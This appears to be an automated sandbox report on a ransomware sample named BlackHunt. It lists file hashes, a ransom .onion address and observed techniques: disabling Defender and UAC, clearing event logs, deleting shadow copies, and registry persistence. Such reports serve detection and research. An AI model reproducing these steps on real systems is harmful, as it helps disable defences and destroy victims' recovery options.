Analysis
-
max time kernel
184s -
max time network
171s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:56
Static task
static1
Behavioral task
behavioral1
Sample
ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe
Resource
win10v2004-20231215-en
General
-
Target
ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe
-
Size
707KB
-
MD5
0e97ce5addad7db0f640380b94a5564c
-
SHA1
425baae4e61dd03e35e64d599dd624ee3285841d
-
SHA256
ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543
-
SHA512
a0e52a6ad41104842edc05cdeb40b64b6e6356a480addb4787a04da1b058f57b8012174d9d6837845e30d0fa358f6e8ce9b9ee383976a7a8398f4c128dbd42d9
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza198Nvnh:6uaTmkZJ+naie5OTamgEoKxLW45h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2740 fsutil.exe 3272 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3412 wevtutil.exe 3560 wevtutil.exe 1608 wevtutil.exe 2512 wevtutil.exe 892 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 3100 bcdedit.exe 3400 bcdedit.exe 2924 bcdedit.exe 948 bcdedit.exe -
Renames multiple (2392) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3692 wbadmin.exe 1312 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2044 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\J: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\K: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\X: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\O: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\A: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\S: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\Z: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\V: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\R: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\T: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\U: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\N: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\G: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\E: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\Y: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\H: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\B: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\I: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\P: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\L: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened (read-only) \??\M: ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.hta ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\RestartPop.lock ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\#BlackHunt_Private.key ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#BlackHunt_ReadMe.hta ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\#BlackHunt_ReadMe.hta ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\15x15dot.png ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiItalic.ttf ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\curtains.png ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\#BlackHunt_Private.key ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#BlackHunt_ReadMe.hta ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Madrid ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_ReadMe.txt ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\#BlackHunt_Private.key ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\#BlackHunt_ReadMe.hta ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\#BlackHunt_ReadMe.txt ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\LICENSE ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\Java\jre7\lib\applet\#BlackHunt_Private.key ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#BlackHunt_ReadMe.txt ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.txt ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Jujuy ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.lock ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\PST8PDT ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#BlackHunt_Private.key ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#BlackHunt_Private.key ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#BlackHunt_ReadMe.hta ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#BlackHunt_ReadMe.hta ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Bucharest ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#BlackHunt_ReadMe.txt ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\#BlackHunt_ReadMe.txt ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3512 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2660 vssadmin.exe 2300 vssadmin.exe 2736 vssadmin.exe 3300 vssadmin.exe 3116 vssadmin.exe 4008 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2828 taskkill.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4072 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2300 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe Token: SeRestorePrivilege 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe Token: SeBackupPrivilege 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe Token: SeTakeOwnershipPrivilege 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe Token: SeAuditPrivilege 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe Token: SeSecurityPrivilege 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe Token: SeIncBasePriorityPrivilege 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe Token: SeBackupPrivilege 3640 vssvc.exe Token: SeRestorePrivilege 3640 vssvc.exe Token: SeAuditPrivilege 3640 vssvc.exe Token: SeBackupPrivilege 2968 wbengine.exe Token: SeRestorePrivilege 2968 wbengine.exe Token: SeSecurityPrivilege 2968 wbengine.exe Token: SeSecurityPrivilege 3560 wevtutil.exe Token: SeBackupPrivilege 3560 wevtutil.exe Token: SeSecurityPrivilege 1608 wevtutil.exe Token: SeBackupPrivilege 1608 wevtutil.exe Token: SeSecurityPrivilege 3412 wevtutil.exe Token: SeBackupPrivilege 3412 wevtutil.exe Token: SeSecurityPrivilege 892 wevtutil.exe Token: SeBackupPrivilege 892 wevtutil.exe Token: SeSecurityPrivilege 2512 wevtutil.exe Token: SeBackupPrivilege 2512 wevtutil.exe Token: SeDebugPrivilege 2828 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2988 wrote to memory of 2572 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 30 PID 2988 wrote to memory of 2572 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 30 PID 2988 wrote to memory of 2572 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 30 PID 2988 wrote to memory of 2572 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 30 PID 2988 wrote to memory of 2588 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 32 PID 2988 wrote to memory of 2588 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 32 PID 2988 wrote to memory of 2588 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 32 PID 2988 wrote to memory of 2588 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 32 PID 2988 wrote to memory of 2604 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 33 PID 2988 wrote to memory of 2604 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 33 PID 2988 wrote to memory of 2604 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 33 PID 2988 wrote to memory of 2604 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 33 PID 2988 wrote to memory of 2644 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 35 PID 2988 wrote to memory of 2644 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 35 PID 2988 wrote to memory of 2644 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 35 PID 2988 wrote to memory of 2644 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 35 PID 2988 wrote to memory of 1088 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 37 PID 2988 wrote to memory of 1088 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 37 PID 2988 wrote to memory of 1088 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 37 PID 2988 wrote to memory of 1088 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 37 PID 2988 wrote to memory of 2324 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 40 PID 2988 wrote to memory of 2324 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 40 PID 2988 wrote to memory of 2324 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 40 PID 2988 wrote to memory of 2324 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 40 PID 2988 wrote to memory of 2124 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 41 PID 2988 wrote to memory of 2124 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 41 PID 2988 wrote to memory of 2124 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 41 PID 2988 wrote to memory of 2124 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 41 PID 2988 wrote to memory of 564 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 43 PID 2988 wrote to memory of 564 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 43 PID 2988 wrote to memory of 564 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 43 PID 2988 wrote to memory of 564 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 43 PID 2988 wrote to memory of 1480 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 45 PID 2988 wrote to memory of 1480 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 45 PID 2988 wrote to memory of 1480 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 45 PID 2988 wrote to memory of 1480 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 45 PID 2988 wrote to memory of 368 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 47 PID 2988 wrote to memory of 368 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 47 PID 2988 wrote to memory of 368 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 47 PID 2988 wrote to memory of 368 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 47 PID 2988 wrote to memory of 1472 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 49 PID 2988 wrote to memory of 1472 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 49 PID 2988 wrote to memory of 1472 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 49 PID 2988 wrote to memory of 1472 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 49 PID 2988 wrote to memory of 2552 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 51 PID 2988 wrote to memory of 2552 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 51 PID 2988 wrote to memory of 2552 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 51 PID 2988 wrote to memory of 2552 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 51 PID 2988 wrote to memory of 1192 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 53 PID 2988 wrote to memory of 1192 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 53 PID 2988 wrote to memory of 1192 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 53 PID 2988 wrote to memory of 1192 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 53 PID 2988 wrote to memory of 660 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 55 PID 2988 wrote to memory of 660 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 55 PID 2988 wrote to memory of 660 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 55 PID 2988 wrote to memory of 660 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 55 PID 2988 wrote to memory of 2888 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 57 PID 2988 wrote to memory of 2888 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 57 PID 2988 wrote to memory of 2888 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 57 PID 2988 wrote to memory of 2888 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 57 PID 2988 wrote to memory of 2900 2988 